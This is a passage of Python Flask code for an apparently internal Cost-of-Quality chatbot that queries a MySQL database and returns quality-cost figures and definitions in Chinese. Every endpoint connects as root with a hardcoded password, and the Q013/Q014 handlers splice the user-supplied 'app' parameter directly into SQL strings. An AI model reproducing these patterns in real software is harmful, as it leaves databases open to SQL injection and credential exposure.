yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting=''",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' Target'] = str(round(float(cur.fetchone()[0])*100,2))+'%';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q009',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q010" : # 10. Q010 外失售保成本是多少? sorting='05'
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='05'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 外失售保成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q010',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q011" : # 11. Q011 AERB內失成本是多少? sorting='07'
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select IFNULL(cost, 0) from forboard where yearmonth=%s and app=%s and sorting='07'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' AERB內失成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q011',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q012" : # 12. Q012 外失Rebate成本是多少? sorting='06'
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='06'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 外失Rebate成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q012',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q013" : # 13. Q013 Top3 Model
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
buList = ['ITI BU','AA BU','MD BU','TV BU']
appList = ['TV','SET_TV','AA-BD4','NB','MONITOR','IAVM','MP','CE','TABLET','AUTO-BD5']
# get Below standard
belowStandardApp = ''
if app == '所有應用' :
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target' and app <> %s and app not in ('AII BU','MD BU')) b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000",(yearmonth,app,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'MD BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('MP','CE','Tablet')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'ITI BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('NB','Monitor','IAVM')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'AA BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('AA-BD4','AUTO-BD5')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'TV BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('TV','SET_TV')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
else :
belowStandardApp = "'"+app+"'"
# get top 3 model
if (app == 'ITI BU' or app == 'AA BU' or app == 'MD BU' or app == 'TV BU') and belowStandardApp != '' :
cur.execute("select bu,model,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,customer,cost_category,ROUND(BYMODELCUSTOMERCATE_COST/1000000,2) bymodelcustomercate_cost from coq.mc where yearmonth=%s and bu in ("+belowStandardApp+") and length(board_title)=26 and rank = 1 order by rank,cost limit 5",(yearmonth))
elif app in appList and belowStandardApp != '' :
cur.execute("select bu,model,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,customer,cost_category,ROUND(BYMODELCUSTOMERCATE_COST/1000000,2) bymodelcustomercate_cost from coq.mc where yearmonth=%s and bu in ("+belowStandardApp+") and length(board_title)=26 order by rank,cost limit 5",(yearmonth))
elif belowStandardApp != '':
cur.execute("select distinct bu,model,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,customer,cost_category,ROUND(BYMODELCUSTOMERCATE_COST/1000000,2) bymodelcustomercate_cost,rank from coq.mc where yearmonth=%s and length(board_title)=26 and bu in ("+belowStandardApp+") order by rank,cost limit 5",(yearmonth))
i = 1
if cur.rowcount > 0 :
for r in cur :
returnData['('+str(i)+')'] = r[1]+'外失成本'+str(r[2])+'(M NTD) 佔'+r[0]+'總外失比為'+str(r[3])+'%。該機種以客戶'+str(r[4])+'發生'+str(r[5])+'所佔最高,為'+str(r[6])+'(M NTD)';
i = i + 1
returnData[' '+str(yearmonth)+' '+app+' Top3 Model'] = ''
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q013',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q014" : # 14. Q014 Top3 Customer
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
buList = ['ITI BU','AA BU','MD BU','TV BU']
appList = ['TV','SET_TV','AA-BD4','NB','MONITOR','IAVM','MP','CE','TABLET','AUTO-BD5']
# get Below standard
belowStandardApp = ''
if app == '所有應用' :
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target' and app <> %s and app not in ('AII BU','MD BU')) b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000",(yearmonth,app,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'MD BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('MP','CE','Tablet')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'ITI BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('NB','Monitor','IAVM')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'AA BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('AA-BD4','AUTO-BD5')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'TV BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('TV','SET_TV')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
else :
belowStandardApp = "'"+app+"'"
# get top 3 customer
if (app == 'ITI BU' or app == 'AA BU' or app == 'MD BU' or app == 'TV BU') and belowStandardApp != '' :
cur.execute("select bu,customer,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate from coq.mc where yearmonth=%s and bu in ("+belowStandardApp+") and length(board_title)=30 and rank = 1 order by rank,cost limit 5",(yearmonth ))
elif app in appList and belowStandardApp != '' :
cur.execute("select bu,customer,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate from coq.mc where yearmonth=%s and bu in ("+belowStandardApp+") and length(board_title)=30 order by rank,cost limit 5",(yearmonth ))
elif belowStandardApp != '':
cur.execute("select distinct bu,customer,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,`rank` from coq.mc where yearmonth=%s and length(board_title)=30 and bu in ("+belowStandardApp+") order by rank,cost limit 5",(yearmonth))
i = 1
if cur.rowcount > 0 :
for r in cur :
returnData['('+str(i)+')'] = r[1]+'外失成本'+str(r[2])+' (M NTD) 佔'+r[0]+'總外失比為'+str(r[3])+'%。'
i = i + 1
returnData[' '+str(yearmonth)+' '+app+' Top3 Customer'] = ''
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q014',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q015" : # 15. Q015 預計損失圖
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
cur.execute("SELECT round(sum(total)/1000000,2) FROM aerb where yearmonth=%s",(yearmonth))
AERB = cur.fetchone()[0];
returnData = OrderedDict();
returnData[str(yearmonth)+' '+app+' AERB預期未來損失'] = str(AERB)+'M (NTD)'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q015',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q016" : # 16. Q016 2018年度CoQ狀況
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
cur.execute("SELECT round(GROUP_CONCAT(if(sorting = '', cost, NULL))*100,2),round(GROUP_CONCAT(if(sorting = '10', cost, NULL))*12/1000000,2),round(GROUP_CONCAT(if(sorting = '13', cost, NULL))/10000,2) FROM forboard where app=%s and yearmonth=201800 and sorting in ('','10','13')",(app))
for r in cur :
returnData['2018 '+app+'年度CoQ狀況']=''
returnData['Target']=str(r[0])+'%'
returnData['CoQ']=str(r[1])+'M (NTD)'
returnData['CoQ Rate']=str(r[2])+'%'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,None,'Q016',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q017" : # 17. Q017 BU月圖
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
yearmonth = cur.fetchone()[0];
returnData = OrderedDict();
returnData[' '+str(yearmonth)+' '+app+'BU月圖']=''
if app == '所有應用':
cur.execute("SELECT IFNULL(a5,0)+IFNULL(a6,0)+IFNULL(a7,0)+IFNULL(a8,0) FROM accumulation where app='所有應用' and yearmonth=%s",(yearmonth))
elif app == 'MD BU':
cur.execute("SELECT IFNULL(a4,0)+IFNULL(a5,0)+IFNULL(a6,0) FROM accumulation where app='MD BU' and yearmonth=%s",(yearmonth))
elif app == 'TV BU':
cur.execute("SELECT IFNULL(a3,0)+IFNULL(a4,0) FROM accumulation where app='TV BU' and yearmonth=%s",(yearmonth))
elif app == 'ITI BU':
cur.execute("SELECT IFNULL(a4,0)+IFNULL(a5,0)+IFNULL(a6,0) FROM accumulation where app='ITI BU' and yearmonth=%s",(yearmonth))
elif app == 'AA BU':
cur.execute("SELECT IFNULL(a3,0)+IFNULL(a4,0) FROM accumulation where app='AA BU' and yearmonth=%s",(yearmonth))
else :
cur.execute("SELECT IFNULL(a8,0)+IFNULL(a9,0)+IFNULL(a10,0)+IFNULL(a11,0) FROM accumulation where app=%s and yearmonth=%s",(app,yearmonth))
accumulationValue = cur.fetchone()[0];
returnData['1. 截至'+str(yearmonth)+'累計CoQ目標'] = str(round(accumulationValue/1000000,1))+'M (NTD)'
cur.execute('SELECT output1,output2,output3,output4,output5,output6 FROM remainCoQ where yearmonth = %s and application = %s',(yearmonth,app))
for r in cur :
returnData['2. 截至'+str(yearmonth)+'累計已支出CoQ'] = str(round(r[1]/1000000,1))+'M (NTD)'
returnData['3. 年底達標預計可支出總CoQ'] = str(round(r[0]/1000000,1))+'M (NTD)'
returnData['4. 年剩餘額度'] = str(round(r[2]/1000000,1))+'M (NTD)'
returnData['5. 年剩餘可控額度'] = str(round(r[4]/1000000,1))+'M (NTD)'
returnData['6. 年平均CoQ Rate'] = str(round(r[3]*100,2))+'%'
returnData['7. 年供應商賠償總額'] = str(round(r[5]/1000000,1))+'M (NTD)'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q017',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q035" : # 35. CoQ是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['CoQ(Cost of Quality)']='指為了提高和保證產品品質而支出的一切費用,以及因產品品質未達到規定的要求而造成的一切損失的總和。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q035',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q036" : # 36. CoQ rate怎麼算
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['CoQ Rate']='Σ(預防+鑑定+內失+外失)成本 / 營收'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q036',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q037" : # 37. 預防成本是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['學術定義']='用於避免生產出不良品而投入的成本。'
returnData['資料定義']='DQ/SQ/MQ/QS的十大費用(排除直接人事費用)。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q037',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q038" : # 38. 鑑定成本是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['學術定義']='檢驗產品是否符合標準的成本。'
returnData['資料定義']='DQ/SQ/MQ/QS的十大費用(排除直接人事費用)。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q038',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q039" : # 39. 外失成本是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['學術定義']='產品運交至顧客後,因未能達到品質要求而造成的損失。'
returnData['資料定義']='MQ/SQ的部份間接人事費用<br>產品於廠內執行報廢/重工/降等所產生的費用。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q039',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q040" : # 40. 內失成本是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['學術定義']='產品運交至顧客前,因未能達到品質要求而造成的損失。'
returnData['資料定義']='1.RMA返品的維修、報廢、OBA/SORTING、賠償...等相關費用。<br>2.因品質問題導致營收減少的費用。<br>3.外失-其它:CQ/RMA的十大費用(排除營運費用)。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q040',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q041" : # 41. 外失售保是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['資料定義']='RMA管理帳的費用。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q041',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q042" : # 42. 內失AERB是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['資料定義']='廠內有標誌AERB,至降等或報廢的PANEL。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q042',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q043" : # 43. 外失Rebate是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['資料定義']='CQE 客戶要求rebate的費用。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q043',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q048" : # 48. Q048 EXP 20200131
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
cur.execute('SELECT round(100*(IFNULL(GROUP_CONCAT(if(sorting = "01", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "02", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "03", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "04", cost, NULL)),0))/sum(cost),2) FROM forboard WHERE yearmonth = %s and app=%s and sorting in ("01","02","03","04","05","06","07") group by yearmonth',(yearmonth,app))
EXPRate = cur.fetchone()[0];
returnData = OrderedDict();
if yearmonth % 100 == 0 :
yearmonthTmp = str(yearmonth//100)+'全年'
else :
yearmonthTmp = str(yearmonth)
returnData[yearmonthTmp+' '+app+' EXP佔比'] = str(EXPRate)+'%'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q048',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q049" : # 49. Q049 CoPQ 20200131
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
cur.execute('SELECT round(100*(IFNULL(GROUP_CONCAT(if(sorting = "05", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "06", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "07", cost, NULL)),0))/sum(cost),2) FROM forboard WHERE yearmonth = %s and app=%s and sorting in ("01","02","03","04","05","06","07") group by yearmonth',(yearmonth,app))
CoPQRate = cur.fetchone()[0];
returnData = OrderedDict();
if yearmonth % 100 == 0 :
yearmonthTmp = str(yearmonth//100)+'全年'
else :
yearmonthTmp = str(yearmonth)
returnData[yearmonthTmp+' '+app+' CoPQ佔比'] = str(CoPQRate)+'%'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q049',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 1. Q001 CoQ現況
@app.route("/Q001", methods=['GET'])
def Q001():
    """CoQ current-status endpoint (Q001).

    Query-string parameters:
        app       -- application / BU name used to filter the `forboard` table.
        yearmonth -- integer such as 201904; defaults to (and is capped at) the
                     latest month with a complete data load when missing,
                     non-numeric, or in the future.
        Chat_ID   -- chat-session id, forwarded to updateChat() for logging.

    Returns a CORS-enabled JSON object with: total CoQ (incl. supplier
    compensation), target attainment, month-over-month CoQ-rate trend,
    this/previous month CoQ rates, and the CoQ-rate target.
    """
    conn = pymysql.connect(host=host, port=port, user='root', passwd="1234", db='coq')
    try:
        cur = conn.cursor()
        app = request.args.get('app')
        Chat_ID = request.args.get('Chat_ID')
        # Latest month whose data load is complete (>300 rows); serves as both
        # the default and the upper bound for the requested month.
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = int(cur.fetchone()[0])
        # BUG FIX: the original called int(request.args.get('yearmonth')) up
        # front, which raised TypeError (HTTP 500) when the parameter was
        # missing; its later `yearmonth == ''` check could never be true for
        # an int.  Fall back to the latest complete month instead.
        try:
            yearmonth = int(request.args.get('yearmonth'))
        except (TypeError, ValueError):
            yearmonth = maxYearmonth
        if yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        # (1) Total CoQ including supplier compensation (sorting='10'), in NTD.
        cur.execute("SELECT cost FROM forboard where app=%s and yearmonth=%s and sorting = '10'", (app, yearmonth))
        returnData[' (1) '+str(yearmonth)+app+'CoQ總計(含供應商求償)'] = str(round(cur.fetchone()[0]/1000000, 2))+'M (NTD)'
        # (5) Target attainment: actual CoQ (sorting='12', NTD) minus the
        # target rate (sorting='') scaled by 1e6; <=0 means the target was met.
        ans = '未達標'
        cur.execute("select GROUP_CONCAT(if(sorting = '12', cost , NULL))- GROUP_CONCAT(if(sorting = '', cost*1000000, NULL)) from forboard WHERE sorting in ('12','') and app=%s and yearmonth=%s", (app, yearmonth))
        if int(cur.fetchone()[0]) <= 0:
            ans = '達標'
        returnData[' (5) CoQ Rate 趨勢'] = ans
        # Previous month (January rolls back to December of the prior year).
        if yearmonth % 100 == 1:
            yearmonth2 = yearmonth - 100 + 11
        else:
            yearmonth2 = yearmonth - 1
        # Fetch both months' CoQ rates in one query.  (The original ran this
        # exact query twice; executing it once is sufficient.)
        cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)", (yearmonth, yearmonth2, app, yearmonth2, yearmonth))
        r = cur.fetchone()
        rate = round(float(r[0])/10000, 2)
        rate2 = round(float(r[1])/10000, 2)
        # (6) Month-over-month verdict; a worsening within 5% relative still
        # counts as flat.  BUG FIX: guard the division against rate2 == 0.
        if rate < rate2:
            ans = '改善'
        elif rate > rate2:
            ans = '惡化'
            if rate2 != 0 and (rate - rate2)/rate2 <= 0.05:
                ans = '持平'
        else:
            ans = '持平'
        returnData[' (6) 較上月'+ans] = str(abs(round(rate-rate2, 2)))+'%'
        returnData[' (2) '+str(yearmonth2)+' CoQ Rate'] = str(rate2)+'%'
        returnData[' (3) '+str(yearmonth)+' CoQ Rate'] = str(rate)+'%'
        # (4) CoQ-rate target (sorting='') is stored as a fraction; show as %.
        cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting=''", (yearmonth, app))
        returnData[' (4) CoQ Rate Target'] = str(round(float(cur.fetchone()[0])*100, 2))+'%'
    finally:
        # BUG FIX: the original never closed the connection, leaking one DB
        # connection per request.
        conn.close()
    answerText = json.dumps(returnData, ensure_ascii=False)
    updateChat(app, yearmonth, 'Q001', answerText, Chat_ID)
    response = jsonify(returnData)
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
# 2. Q002 CoQ / CoQ Rate 是否超標
@app.route("/Q002", methods=['GET'])
def Q002():
    """CoQ / CoQ-Rate target-attainment endpoint (Q002).

    Query-string parameters:
        app       -- application / BU name used to filter the `forboard` table.
        yearmonth -- integer such as 201904; defaults to (and is capped at) the
                     latest month with a complete data load when missing,
                     non-numeric, or in the future.
        Chat_ID   -- chat-session id, forwarded to updateChat() for logging.

    Returns a CORS-enabled JSON object with the attainment verdict, the
    month's CoQ rate, and the month-over-month change.
    """
    conn = pymysql.connect(host=host, port=port, user='root', passwd="1234", db='coq')
    try:
        cur = conn.cursor()
        app = request.args.get('app')
        Chat_ID = request.args.get('Chat_ID')
        # Latest month whose data load is complete (>300 rows).
        cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
        maxYearmonth = cur.fetchone()[0]
        # BUG FIX: the original converted the parameter with int() up front,
        # raising TypeError (HTTP 500) when it was absent; its `yearmonth == ''`
        # check was unreachable for an int.
        try:
            yearmonth = int(request.args.get('yearmonth'))
        except (TypeError, ValueError):
            yearmonth = maxYearmonth
        if yearmonth > maxYearmonth:
            yearmonth = maxYearmonth
        returnData = OrderedDict()
        # Attainment: actual CoQ (sorting='12', NTD) minus target rate
        # (sorting='') scaled by 1e6; <=0 means the target was met.
        ans = '未達標'
        cur.execute("select GROUP_CONCAT(if(sorting = '12', cost , NULL))- GROUP_CONCAT(if(sorting = '', cost*1000000, NULL)) from forboard WHERE sorting in ('12','') and app=%s and yearmonth=%s", (app, yearmonth))
        if int(cur.fetchone()[0]) <= 0:
            ans = '達標'
        returnData[' '+str(yearmonth)+' '+app+' CoQ Rate'+'趨勢'] = ans
        # Previous month (January rolls back to December of the prior year).
        if yearmonth % 100 == 1:
            yearmonth2 = yearmonth - 100 + 11
        else:
            yearmonth2 = yearmonth - 1
        cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)", (yearmonth, yearmonth2, app, yearmonth2, yearmonth))
        r = cur.fetchone()
        rate = round(float(r[0])/10000, 2)
        rate2 = round(float(r[1])/10000, 2)
        returnData['CoQ Rate'] = str(rate)+'%'
        # Month-over-month verdict; a worsening within 5% relative still counts
        # as flat.  BUG FIX: guard the division against rate2 == 0.
        if rate < rate2:
            ans = '改善'
        elif rate > rate2:
